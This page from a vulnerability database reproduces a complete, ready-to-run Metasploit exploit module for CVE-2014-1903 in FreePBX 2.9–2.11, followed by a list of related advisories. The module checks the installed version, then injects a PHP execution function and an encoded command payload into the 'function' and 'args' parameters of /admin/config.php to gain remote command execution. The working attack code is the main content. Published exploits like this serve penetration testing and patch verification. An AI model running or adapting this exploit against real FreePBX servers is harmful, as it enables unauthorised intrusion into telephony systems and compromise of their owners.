Lucene search
I-HmxPACKETSTORM:125856HistoryMar 25, 2014 - 12:00 a.m.
FreePBX config.php Remote Code Execution
2014-03-2500:00:00
i-Hmx
packetstormsecurity.com
20
0.965 High
EPSS
Percentile
99.6%
`##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "FreePBX config.php Remote Code Execution",
'Description' => %q{
This module exploits a vulnerability found in FreePBX version 2.9, 2.10, and 2.11.
It's possible to inject arbitrary PHP functions and commands in the "/admin/config.php"
parameters "function" and "args".
},
'License' => MSF_LICENSE,
'Author' =>
[
'i-Hmx', # Vulnerability discovery
'0x00string', # PoC
'xistence <xistence[at]0x90.nl>' # Metasploit module
],
'References' =>
[
['CVE', '2014-1903'],
['OSVDB', '103240'],
['EDB', '32214'],
['URL', 'http://issues.freepbx.org/browse/FREEPBX-7123']
],
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' =>
[
['FreePBX', {}]
],
'Privileged' => false,
'DisclosureDate' => "Mar 21 2014",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to the FreePBX installation', '/'])
], self.class)
register_advanced_options(
[
OptString.new('PHPFUNC', [true, 'The PHP execution function to use', 'passthru'])
], self.class)
end
def check
vprint_status("#{peer} - Trying to detect installed version")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "admin", "CHANGES")
})
if res and res.code == 200 and res.body =~ /^(.*)$/
version = $1
else
return Exploit::CheckCode::Unknown
end
vprint_status("#{peer} - Version #{version} detected")
if version =~ /2\.(9|10|11)\.0/
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
end
def exploit
rand_data = rand_text_alpha_lower(rand(10) + 5)
print_status("#{peer} - Sending payload")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "admin", "config.php"),
'vars_get' => {
"display" => rand_data,
"handler" => "api",
"function" => datastore['PHPFUNC'],
"args" => payload.encoded
}
})
# If we don't get a 200 when we request our malicious payload, we suspect
# we don't have a shell, either.
if res and res.code != 200
print_error("#{peer} - Unexpected response, exploit probably failed!")
end
end
end
`
Related
seebug
seebug
FreePBX 2.11.0 - Remote Command Execution
2014-07-01 00:00:00
cve
cve
CVE-2014-1903
2014-02-18 11:55:16
exploitpack
exploitpack
FreePBX 2.11.0 - Remote Command Execution
2014-03-12 00:00:00
checkpoint_advisories
checkpoint_advisories
FreePBX config php Code Execution (CVE-2014-1903)
2014-05-18 00:00:00
openvas
openvas
FreePBX 2.9 - 12 RCE Vulnerability - Active Check
2014-03-14 00:00:00
saint
saint
FreePBX Framework Module view.functions.php Remote Code Execution
2014-04-03 00:00:00
FreePBX Framework Module view.functions.php Remote Code Execution
2014-04-03 00:00:00
FreePBX Framework Module view.functions.php Remote Code Execution
2014-04-03 00:00:00
prion
prion
Code injection
2014-02-18 11:55:00
nvd
nvd
CVE-2014-1903
2014-02-18 11:55:16
cvelist
cvelist
CVE-2014-1903
2014-02-18 11:00:00
zdt
zdt
FreePBX config.php Remote Code Execution Vulnerability
2014-03-25 00:00:00
exploitdb
exploitdb
FreePBX 2.11.0 - Remote Command Execution
2014-03-12 00:00:00